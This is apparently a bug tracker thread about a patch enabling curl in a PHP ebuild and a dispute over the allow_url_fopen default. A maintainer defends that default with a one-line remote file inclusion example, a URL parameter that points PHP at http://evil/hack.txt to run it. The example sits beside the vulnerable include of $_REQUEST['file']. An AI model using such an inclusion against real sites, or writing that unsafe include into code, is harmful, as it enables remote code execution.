Hi, here's a small patch to enable curl support in mod_php. The curl functions in PHP are very usefull to "emulate" a webbrowser w/ cookie/http/ssl support etc. BTW, please re-enable "allow_url_fopen" in php.ini. It's totally useless to disable this by default for "security reasons". If a user really want to abuse the system, he can use fsockopen() instead of fopen(). Reproducible: Always Steps to Reproduce:
Created attachment 18361 [details, diff] patch for curl support in moh_php ebuild
PHP and mod_php already have curl support (USE=curl), inside the PHP eclass. I've added the --with-curlwrappers option. the allow_url_fopen security fix exists so stop people writing insecure code. eg foo.php contains: include $_REQUEST['file']; and the person uses it like: http://host/foo.php?file=next.php this is exploitable as: http://host/foo.php?file=http://evil/hack.txt PHP then runs hack.txt. Perl has taint checks to stop this, but PHP doesn't. If you really don't like it, just change your php.ini. I'm informed that PHP may be shipping it's default configuration with allow_url_fopen disabled in future.
re-opening to assign to php-bugs.
closing properly
